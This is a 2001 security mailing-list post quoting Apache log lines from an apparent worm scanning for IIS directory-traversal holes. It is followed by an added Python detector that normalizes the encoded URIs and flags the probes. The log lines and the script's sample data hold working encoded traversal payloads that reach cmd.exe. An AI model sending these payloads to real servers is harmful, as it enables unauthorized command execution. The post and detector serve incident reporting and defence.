Security Incidents mailing list archives

Possible new worm using directory traversal vulnerability?


From: thomas lakofski <thomas () 88 net>
Date: Tue, 18 Sep 2001 15:13:14 +0100 (BST)

Hi,

Found this in my logs this afternoon; you may find it interesting. From what I
can tell it's following a similar pattern of address scanning as CRII -- looks
like too many hosts, too quickly, to be manual scanning:

Here's a sample; the full log is at http://88.net/~thomas/codeindigo.txt [for
want of a better name]

209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:02 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:05 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:06 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

regards,

-thomas


-- 
 Do what thou wilt shall be the whole of the Law.
                -- Aleister Crowley
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43
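As an added defensive example (not part of Thomas's post or anything the list itself provides), the following Python script parses Apache combined-format lines like the ones quoted above, normalizes each request URI through the encodings the scan cycles through (double percent-encoding such as %255c and %25%35%63, and overlong two-byte UTF-8 sequences such as %c0%af and %c1%1c), and flags requests that resolve to a parent-directory traversal or end in cmd.exe. It then counts, per source address, how many distinct raw encodings were tried, which is the "too many variants, too quickly" pattern the post points at. The overlong decoder is lenient on the assumption that the decoder being modelled accepted any second byte (that is why %c1%1c is folded to a backslash); the sample log embeds six lines copied from the post plus one constructed benign request, and all helper names are my own.

```python
"""Flag encoded directory-traversal / cmd.exe probes in Apache combined logs.

Added example for the thread above; not code from the original post.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache combined log format; only the fields needed for classification are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r"(^|/)\.\./")

# Constructed sample: six lines taken from the post plus one benign request.
SAMPLE_LOG = """\
209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
10.0.0.5 - - [18/Sep/2001:13:25:00 +0000] "GET /index.html HTTP/1.0" 200 1234 "-" "-"
"""


def decode_overlong(data: bytes) -> bytes:
    """Collapse two-byte overlong UTF-8 (lead byte 0xC0/0xC1) to the ASCII byte
    it encodes, e.g. C0 AF -> '/', C1 9C -> '\\'.  Assumption: the decoder being
    modelled accepted any second byte, so C1 1C is likewise treated as '\\'."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def normalize_uri(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode to a fixed point (so %255c -> %5c -> '\\', and %25%35%63
    likewise), then fold overlong UTF-8 and backslashes into '/'."""
    raw = uri.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return decode_overlong(raw).decode("latin-1").replace("\\", "/")


def classify(line: str):
    """Return a dict describing the request, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    norm = normalize_uri(uri)
    path = norm.split("?", 1)[0]
    indicators = []
    if TRAVERSAL_RE.search(path):
        indicators.append("traversal")
    if path.lower().endswith("cmd.exe"):
        indicators.append("cmd.exe")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
            "uri": uri, "normalized": norm, "indicators": indicators}


def summarize(log_text: str) -> dict:
    """Per source IP: total requests, how many were flagged, and how many
    distinct raw encodings were tried.  Many distinct encodings from one
    address within seconds is the automated-scanner signature in the post."""
    stats = defaultdict(lambda: {"requests": 0, "flagged": 0, "encodings": set()})
    for line in log_text.splitlines():
        rec = classify(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["requests"] += 1
        if rec["indicators"]:
            s["flagged"] += 1
            s["encodings"].add(rec["uri"])
    return {ip: {"requests": s["requests"], "flagged": s["flagged"],
                 "distinct_encodings": len(s["encodings"])} for ip, s in stats.items()}


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        rec = classify(line)
        if rec and rec["indicators"]:
            print(f'{rec["ip"]} {rec["status"]} {rec["normalized"]}  <- {",".join(rec["indicators"])}')
    print(summarize(SAMPLE_LOG))
```

Note that the script flags on the normalized path regardless of status code: the 404 and 400 responses in the post mean this particular server did not serve the request, but the source is still probing, and the same normalization is what a server-side filter has to apply before any path check, otherwise each new encoding slips past a plain string match on "..".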



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

